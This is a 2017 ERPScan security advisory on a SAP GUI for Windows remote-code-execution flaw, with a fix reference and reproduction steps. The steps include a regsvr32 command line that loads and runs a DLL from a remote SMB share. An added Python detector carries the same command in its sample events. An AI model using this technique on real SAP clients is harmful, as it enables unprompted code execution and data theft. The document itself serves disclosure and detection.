[ERPSCAN-17-011] SAP GUI for Windows – Remote Code Execution + bypass security policy

Application: SAP GUI
Versions Affected: SAP GUI 7.2-7.5
Vendor URL: SAP
Bugs: Remote Code Execution
Reported: 15.12.2016
Vendor response: 16.12.2016
Date of Public Advisory: 14.03.2017
Reference: SAP Security Note 2407616
Authors: Dmitry Yudin (ERPScan) aka @ret5et, Vahagn Vardanyan (ERPScan), Dmitry Chastuhin (ERPScan)

VULNERABILITY INFORMATION

Class: Remote Code Execution
Impact: Remote exploitation, bypass of security
Remotely Exploitable: yes
Locally Exploitable: no

CVSS Information

CVSS Base Score v3: 8.0 / 10
CVSS Base Vector: AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

AV: Attack Vector (Related exploit range): Network (N)
AC: Attack Complexity (Required attack complexity): High (H)
PR: Privileges Required (Level of privileges needed to exploit): High (H)
UI: User Interaction (Required user participation): None (N)
S: Scope (Change in scope due to impact caused to components beyond the vulnerable component): Changed (C)
C: Impact to Confidentiality: High (H)
I: Impact to Integrity: High (H)
A: Impact to Availability: High (H)

Description

Using specially crafted ABAP code, an attacker can bypass the SAP GUI security policy and execute code without a security prompt.

Business risk

An attacker can use an RCE vulnerability to execute commands remotely without authorization. The commands run with the same privileges as the service that executed them. An attacker can access arbitrary files and directories in the SAP server's filesystem, including application source code, configuration, and critical system files, and thereby obtain critical technical and business-related information stored in the vulnerable SAP system.

VULNERABLE PACKAGES

SAP GUI FOR WINDOWS 7.20 (no longer supported by SAP)
SAP GUI FOR WINDOWS 7.30 (no longer supported by SAP)
SAP GUI FOR WINDOWS 7.40 CORE SP00-SP011

SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, install SAP Security Note 2407616.

TECHNICAL DESCRIPTION

When we open SAP GUI > Options > Security > Security Configuration > Open security configuration, we can see the list of rules that SAP GUI uses. These rules determine whether a security prompt is shown during critical actions (e.g. when ABAP code wants to read a local file, download a file from the server to the client, or execute a program). Our research revealed that SAP GUI ships with a rule that allows reading, writing, and executing the Windows application regsvr32.exe without a security prompt.

regsvr32.exe can load a DLL from a remote SMB share and execute its DllMain function.

To reproduce:

  1. Compile a DLL (the source code can be found below)
  2. Upload the DLL to any SMB share
  3. Create an ABAP program (ZMalw1) and change commandline = '/i /s \\remote_server\tmp\dllmain.dll' to your share path
  4. Execute the ABAP program
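As an added defender-side example (not part of this advisory or ERPScan's proof of concept), the following Python flags process-creation events in which regsvr32.exe is asked to load a module from an SMB share, and raises the severity when the parent is the SAP GUI front end, the path this advisory shows running without a prompt. The SAP GUI process names and the "parent|image|command line" event format are assumptions, and the event lines are constructed.

```python
import re
from typing import Optional

# Assumed SAP GUI front-end process names (adjust to your environment).
SAP_GUI_PARENTS = {"saplogon.exe", "sapgui.exe"}

# Matches a UNC path such as \\server\share\file.dll inside a command line.
UNC_PATH_RE = re.compile(r'\\\\[^\\\s"]+\\[^\s"]+')

# Constructed sample process-creation events, one "parent|image|command line" per line.
SAMPLE_EVENTS = r"""saplogon.exe|C:\Windows\System32\regsvr32.exe|regsvr32.exe /i /s \\remote_server\tmp\dllmain.dll
msiexec.exe|C:\Windows\System32\regsvr32.exe|regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"
saplogon.exe|C:\Windows\System32\regsvr32.exe|regsvr32.exe /s C:\Users\alice\AppData\Local\Temp\x.dll
explorer.exe|C:\Windows\System32\notepad.exe|notepad.exe C:\tmp\notes.txt"""


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def assess(parent: str, image: str, cmdline: str) -> Optional[dict]:
    """Return a finding for a regsvr32 launch worth reviewing, else None.
    UNC (SMB) module paths are flagged; a SAP GUI parent raises severity,
    since the advisory's rule lets that path run without a prompt."""
    if basename(image) != "regsvr32.exe":
        return None
    unc = UNC_PATH_RE.search(cmdline)
    from_sap_gui = basename(parent) in SAP_GUI_PARENTS
    if unc is None and not from_sap_gui:
        return None  # ordinary local registration by another installer
    reasons = []
    if unc:
        reasons.append("module loaded from UNC path " + unc.group(0))
    if from_sap_gui:
        reasons.append("spawned by SAP GUI front end " + basename(parent))
    severity = "high" if (unc and from_sap_gui) else "medium"
    return {"severity": severity, "reasons": reasons, "cmdline": cmdline}


def scan(events: str) -> list:
    """Parse 'parent|image|cmdline' lines and collect the findings."""
    findings = []
    for line in events.splitlines():
        parent, image, cmdline = line.split("|", 2)
        finding = assess(parent, image, cmdline)
        if finding:
            findings.append(finding)
    return findings
```

Feed it the parent image, image and command-line fields from your EDR's or Sysmon's process-creation events; the first sample line is the pattern from the reproduction steps above and is reported as high.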
Figure: Process tree

Figure: SAP GUI

Proof of Concept

Malicious DLL file

Malicious ABAP code